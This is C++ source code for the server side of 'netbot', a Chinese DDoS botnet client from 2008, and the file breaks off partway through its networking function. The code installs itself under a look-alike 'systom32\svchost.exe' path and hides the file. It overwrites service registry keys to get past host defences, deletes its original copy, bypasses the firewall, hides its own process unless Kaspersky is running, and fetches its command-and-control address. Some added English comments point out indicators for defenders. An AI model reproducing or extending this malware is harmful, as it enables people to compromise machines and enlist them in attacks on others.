//////////////////////////////////////////////////////////////////////////
//netbot免费公开版本
//安全警戒线版权所有
//2008年
//www.hackeroo.com
//中华攻客 QQ266370 msn:hackeroo@hotmail.com
//你可以免费使用、修改和传播,但请保留作者版权信息。
//////////////////////////////////////////////////////////////////////////
// Service.cpp : Defines the entry point for the console application.
//
//网络僵尸服务端代码
#include "stdafx.h"
#include "Service.h"
#include "winsock2.h"
#include "winsvc.h"
#include "ProcessHide.h"
#include "TLHELP32.H"//
#include "data.h"
#include <Dbt.h>
#pragma comment(lib,"LIBCTINY.LIB") // presumably a minimal CRT replacement to keep the binary small — confirm against the build
// Custom window message id; not referenced in the visible part of this file.
// Note the macro body is unparenthesised, so `WM_SOCKET * 2` would not expand as intended.
#define WM_SOCKET WM_USER+1000
// Name the binary registers and controls itself under (ServiceMain, StopMyService, StartMyService).
// "RasAuto" is also the name of a stock Windows service, so a service by this name pointing at an
// unexpected image path is a useful detection signal.
#define SERVICE_NAME "RasAuto"
// Embedded configuration blob. WinMain decodes it in place with DecryptRecord() over
// sizeof(MODIFY_DATA) raw bytes, so the field order and sizes must stay exactly as they are.
// The literal defaults below are plaintext; presumably a separate builder overwrites them in the
// compiled binary with the encoded form — confirm, since decoding plaintext defaults would garble them.
struct MODIFY_DATA
{
char IPFile[100]; // either a direct "host:port" address, or an http URL whose content is fetched for the address (see isdns)
char ConnectPass[5];// check-in password: 4 characters plus NUL
bool IsWorm; // whether self-spreading is enabled (consumed outside the visible part of this file)
bool IsUpan; // whether spreading via removable (USB) drives is enabled (consumed outside the visible part of this file)
}modify_data =
{
"127.0.0.1:8090",
"1111",
false,
false,
};
BOOL SetFileAttrib(char *path); // defined elsewhere; WinMain calls it to hide the install directory and file
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
// Process-wide state shared by the SCM entry points (ServiceMain, Handler) and the network code.
SERVICE_STATUS service_status_ss; // status record reported to the SCM; written by ServiceMain and Handler
SERVICE_STATUS_HANDLE handle_service_status; // from RegisterServiceCtrlHandler in ServiceMain
SC_HANDLE scm,svc; // not used in the visible part of this file
SOCKET sock_client;// command-and-control communication socket
SYSTEMINIT sysinfo;// information about the compromised host, reported on check-in (type from a project header)
CLIENTPARA ClientPa;// check-in parameters (type from a project header)
FUCKWEB fuckweb;// attack task parameters (type from a project header)
bool stopfuck; // presumably a flag that aborts the running attack task — used outside the visible part of this file
bool isdns; // set in WinMain: true when IPFile is a direct address, false when it is an http URL to fetch
HWND hWnd; // hidden window created in start(); receives WM_DEVICECHANGE
/* Configuration decoder. */
// Decodes nLen bytes of szRec in place with a repeating NUL-terminated key:
// each byte becomes (byte - k) ^ k, where k is the key byte at the current
// position and the key position wraps to the start whenever it reaches the
// terminator. The key must be non-empty; an empty key would walk past its
// terminator. There is no return value; szRec is modified directly.
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
    char *keyPos = szKey;
    for (unsigned long idx = 0; idx < nLen; ++idx, ++szRec) {
        if (*keyPos == '\0') {
            keyPos = szKey;        // wrap the key
        }
        *szRec -= *keyPos;         // subtract first ...
        *szRec ^= *keyPos;         // ... then XOR with the same key byte
        ++keyPos;
    }
}
// Custom pseudo-random generator: mixes rand() with the system tick count and reduces modulo ran.
// rand() is never seeded in the visible part of this file, and ran must be non-zero (division by zero otherwise).
int SEU_Rand(int ran)
{
unsigned long Time=GetTickCount(); // milliseconds since boot, used as extra entropy
int seed=rand()+3;
seed=(seed*Time)%ran; // int * unsigned long: promoted to unsigned long, reduced, then narrowed back to int
return seed;
}
// Process entry point.
// First run (image is not yet at its install path): copies itself to a look-alike directory under
// the Windows directory, swaps the service configuration (StopMyService / RestoreService /
// StartMyService), deletes the original (uninstall) and exits.
// Later runs (launched by the SCM): decodes the embedded configuration, enforces a single instance
// with a named mutex, and hands control to the SCM dispatcher. nRetCode is only ever 0, and a failed
// StartServiceCtrlDispatcher (e.g. when launched interactively) is not reported.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
//test here
/*
if(strstr(modify_data.IPFile,"http")!=NULL)
isdns=false;
else
isdns=true;
start();
return 1;
*/
///Self-delete----------------------
//Begin=======first run: copy and install========
char DstFilePath[256];
char SrcFilePath[256];
memset(DstFilePath, 0, 256);
memset(SrcFilePath, 0, 256);
::GetWindowsDirectory(DstFilePath,sizeof(DstFilePath));
strcat(DstFilePath,"\\systom32\\"); // look-alike of "system32" — a path-based indicator for defenders
CreateDirectory(DstFilePath, NULL);SetFileAttrib(DstFilePath);//hide the directory
strcat(DstFilePath,"svchost.exe"); // borrows the name of a system binary; the legitimate one lives in system32
GetModuleFileName(NULL, SrcFilePath, sizeof(SrcFilePath));
if (_stricmp(SrcFilePath,DstFilePath) != 0)
{
DeleteFile(DstFilePath);
if(::CopyFile(SrcFilePath,DstFilePath,FALSE)==0)
return -1;
SetFileAttrib(DstFilePath);//hide the file
//replace a system service, to get past host-based proactive defence
if(StopMyService())//stop the service
RestoreService();//overwrite the service's registry key from the embedded hive image
StartMyService();//start the service
uninstall();//self-delete (defined elsewhere)
ExitProcess(0);
}
//End========================================
//decode the configuration block (key is hard-coded)
DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
if(strstr(modify_data.IPFile,"http")!=NULL)
isdns=false;
else
isdns=true;
//create the single-instance mutex; the fixed name "Sking" is a host-based indicator
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Sking");
//check the error code
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
//another instance holds the mutex: release the handle and quit
CloseHandle(m_hMutex);
m_hMutex=NULL;
//exit
ExitProcess(0);
}
//service entry table-----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName=SERVICE_NAME; //service name
service_tab_entry[0].lpServiceProc=ServiceMain; //service entry point
//several entries are allowed; the last one must be NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
//connect to the SCM dispatcher (blocks until the service stops)
StartServiceCtrlDispatcher(service_tab_entry);
return nRetCode;
}
/***********************************************/
//the real service entry point, called by the SCM dispatcher
// Reports RUNNING to the SCM, then: calls ByPassFireWall() (defined elsewhere), hides this process
// unless an avp.exe (Kaspersky) process is found in the process snapshot, changes the process
// priority, and blocks in start(). dwArgc/lpszArgv are unused. The snapshot handle is never closed.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler(SERVICE_NAME,Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}//one control handler per service; a registration failure is silently ignored
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&service_status_ss);
//run my code here
ByPassFireWall();
//hide this process unless a Kaspersky (avp.exe) process is running
bool ishide=true;
HANDLE Snapshot;
Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // never closed: handle leak
PROCESSENTRY32 processListStr;
processListStr.dwSize=sizeof(PROCESSENTRY32);
BOOL return_value;
return_value=Process32First(Snapshot,&processListStr);
int i=0;//item index (counted but otherwise unused)
char ProcessName[32]; // szExeFile is MAX_PATH bytes, so strcpy into 32 bytes can overrun on long image names
while(return_value)
{
strcpy(ProcessName,processListStr.szExeFile);
for(int t=0;t<strlen(ProcessName);t++)
{
ProcessName[t]=processListStr.szExeFile[t]|0x20; // sets bit 5 of every byte: ASCII lower-casing, but also alters non-letters in 0x40-0x5F
}
if(strstr(ProcessName,"avp.exe")!=NULL)
{
ishide=false;
break;
}
return_value=Process32Next(Snapshot,&processListStr);
//fetch the next entry of the system process list
i++;
}
if (ishide)
{
HideCurrentProcess();//hide the process (presumably declared in ProcessHide.h)
}
SetPriorityClass(GetCurrentProcess(),6);//intended to lower the priority; 6 is not a documented *_PRIORITY_CLASS value, so the call likely fails — confirm
start();
return ;
}
/***********************************************/
//service control handler
// Records the requested state in the shared status record and reports it to the SCM.
// On STOP it only reports SERVICE_STOPPED; nothing in this function tears down the work started
// from ServiceMain. SetServiceStatus is also called once more after the switch, for every control.
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
break;
}
::SetServiceStatus(handle_service_status,&service_status_ss);
}
/***********************************************/
// Enables (bEnablePrivilege != 0) or disables one named privilege on the current process token.
// Returns false if the token cannot be opened, the privilege name cannot be resolved, or
// AdjustTokenPrivileges fails. Caveats: AdjustTokenPrivileges returns non-zero even when the
// privilege was not granted (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so true does not prove the
// privilege is held; and hToken is not closed on the success path.
bool SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
HANDLE hToken=NULL;
TOKEN_PRIVILEGES tp;
LUID luid;
if(OpenProcessToken(::GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)==0)
{
// printf("SetPrivilege:OpenProcessToken Fail!");
return false;
}
if ( !LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
// printf("SetPrivilege:LookupPrivilegeValue Fail!");
CloseHandle( hToken );
return false;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
if ( !AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL) )
{
// printf("SetPrivilege:AdjustTokenPrivileges Fail!");
CloseHandle( hToken );
return false;
}
return true;
}
// Overwrites the registry configuration of the Windows Update service (wuauserv) from an embedded
// hive image: writes ServiceBak (from data.h) to <system dir>\update.bak as a hidden file, enables
// SE_RESTORE_NAME, and calls RegRestoreKey on the service key (flag 8 = REG_FORCE_RESTORE) until it
// succeeds, then deletes the file. Returns 0 if the key cannot be opened, 1 otherwise.
// Notes for review: CreateFile/WriteFile results are unchecked; the retry loop has no bound, so a
// persistent RegRestoreKey failure spins forever; the HKEY is released with CloseHandle rather than
// RegCloseKey. The service name here (wuauserv) differs from SERVICE_NAME ("RasAuto") used by
// StopMyService/StartMyService — presumably the embedded hive re-points one of them; confirm against data.h.
// Defender-side, a short-lived hidden update.bak in the system directory plus a wuauserv key change
// is the observable footprint.
int RestoreService()
{
HANDLE hFile;
DWORD dwBytes;
char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"\\update.bak");
hFile=CreateFile(szSysDir,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,NULL);
WriteFile(hFile,ServiceBak,sizeof(ServiceBak)-1,&dwBytes,NULL);
CloseHandle(hFile);
HKEY hService;
LONG tmp;
SetPrivilege(SE_RESTORE_NAME,TRUE); // result ignored; RegRestoreKey needs this privilege
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE, // handle to open key
"SYSTEM\\CurrentControlSet\\Services\\wuauserv", // subkey name
NULL, // reserved
KEY_ALL_ACCESS,// security access mask
&hService // handle to open key
) != ERROR_SUCCESS)
{
// printf("Can't open Service key\n");
return 0;
}
//The first time to Restore always fail even you set the Force flag
//The second time will success.
for(;;)
{
if((tmp = RegRestoreKey(hService,szSysDir, 8 ) ) == ERROR_SUCCESS )
{
break;
}
}
CloseHandle(hService);
DeleteFile(szSysDir);
return 1;
}
/***********************************************/
// Stops the service named SERVICE_NAME if it is running, after switching its start type to
// SERVICE_DEMAND_START (the ChangeServiceConfig call is issued twice, apparently redundantly).
// Returns false only when the SCM cannot be opened; a missing service or a failed stop still
// returns true. Waits for STOP_PENDING to clear by polling every 10 ms with no upper bound.
bool StopMyService()
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//open the service control manager database
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,SERVICE_NAME,SERVICE_ALL_ACCESS);//get a handle to the SERVICE_NAME service
if (schService!=NULL)
{
ChangeServiceConfig(schService,SERVICE_NO_CHANGE, SERVICE_DEMAND_START,SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL);
ChangeServiceConfig(schService,SERVICE_NO_CHANGE, SERVICE_DEMAND_START,SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL);
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)//stop the service if it is not already stopped
{
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
}
}
}
CloseServiceHandle(schService);
}
::CloseServiceHandle(schSCManager);
}
else
return false;
return true;
}
// Starts the service named SERVICE_NAME and polls every 100 ms until it leaves START_PENDING.
// Returns false only when the SCM cannot be opened; returns true when the service is already
// running, and also when the service is missing or StartService fails for any other reason
// (that error code is read but not acted on). The poll loop has no upper bound.
bool StartMyService()
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS ServiceStatus;
DWORD dwErrorCode;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//open the service control manager database
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,SERVICE_NAME,SERVICE_ALL_ACCESS);//get a handle to the SERVICE_NAME service
if (schService!=NULL)
{
if(StartService(schService,0,NULL)==0)//start failed: check whether it is simply already running
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return true;
}
}
while(QueryServiceStatus(schService,&ServiceStatus)!=0)
{
if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
CloseServiceHandle(schService);
}
CloseServiceHandle(schSCManager);
}
else
return false;
return true;
}
/************************************************/
/************************************************/
int start()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="Sking";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;//LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=NULL;//LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"SkingDDos",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
SendMessage(hWnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
//****************************************
int ErrorCode;
WSADATA WsaData;
struct sockaddr_in DestAddr; //上线地址结构
char html[256]; //获取的网页
char *point; //指针
memset(html,0,sizeof(html));
if(isdns)
{
strcpy(html,"[");
strcat(html,modify_data.IPFile);
strcat(html,"]");
}
else
{
//获取网页内容
for(;;)
{
if(GetHttpFile!=NULL)
{
strcpy(html,strlwr(GetHttpFile(modify_data.IPFile)));
break;
}
else
Sleep(30000);
}